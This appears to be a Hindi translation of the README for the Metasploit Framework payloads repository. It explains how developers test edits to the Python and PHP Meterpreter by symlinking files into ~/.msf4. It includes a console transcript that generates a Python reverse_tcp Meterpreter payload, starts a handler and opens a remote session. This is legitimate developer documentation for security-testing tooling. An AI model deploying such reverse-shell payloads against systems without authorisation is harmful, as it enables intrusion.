विभिन्न Metasploit Framework पेलोड्स के लिए एकीकृत रिपॉज़िटरी
यह विभिन्न Metasploit Framework payloads के लिए एक एकीकृत रिपॉज़िटरी है, जो इन रिपॉज़िटरीज़ को मर्ज करती है:
एक वैकल्पिक क्रॉस-प्लेटफ़ॉर्म C Meterpreter, जिसे Mettle कहा जाता है, https://github.com/rapid7/mettle पर विकसित किया गया है
meterpreter-विशिष्ट README, बिल्ड निर्देशों और लाइसेंस विवरण के लिए अलग-अलग डायरेक्टरीज़ देखें:
Python और PHP Meterpreter के लिए, आप संबंधित फ़ाइलों को ~/.msf4/payloads/meterpreter पर symlink करके इन फ़ाइलों में किए गए परिवर्तनों का परीक्षण कर सकते हैं।
उदाहरण के तौर पर, Python Meterpreter संपादन के लिए यह कुछ इस तरह दिख सकता है:
mkdir -p ~/.msf4/payloads
cd ~/metasploit-payloads
ln -s ~/metasploit-payloads/python/meterpreter/ext_server_stdapi.py ~/.msf4/payloads/meterpreter/ext_server_stdapi.py
file ~/.msf4/payloads/meterpreter/ext_server_stdapi.py
/home/your_user/.msf4/payloads/meterpreter/ext_server_stdapi.py: symbolic link to /home/your_user/git/metasploit-payloads/python/meterpreter/ext_server_stdapi.py
यदि सब कुछ ठीक रहा, तो संबंधित Meterpreter payloads में से कोई एक चुनने और session प्राप्त करने पर आपको एक चेतावनी संदेश दिखना चाहिए:
msf6 > use payload/python/meterpreter/reverse_tcp
msf6 payload(python/meterpreter/reverse_tcp) > set LHOST 192.168.153.128
LHOST => 192.168.153.128
msf6 payload(python/meterpreter/reverse_tcp) > generate -f raw -o reverse.py
[*] Writing 436 bytes to reverse.py...
msf6 payload(python/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
[*] Started reverse TCP handler on 192.168.153.128:4444
msf6 payload(python/meterpreter/reverse_tcp) > WARNING: Local file /home/your_user/.msf4/payloads/meterpreter/meterpreter.py is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (24380 bytes) to 192.168.153.1
WARNING: Local file /home/your_user/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (192.168.153.128:4444 -> 192.168.153.1:50334) at 2022-12-13 12:49:49 -0600
Meterpreter में परिवर्तन करते समय - सुनिश्चित करें कि test modules कार्यशील सत्यापित हैं।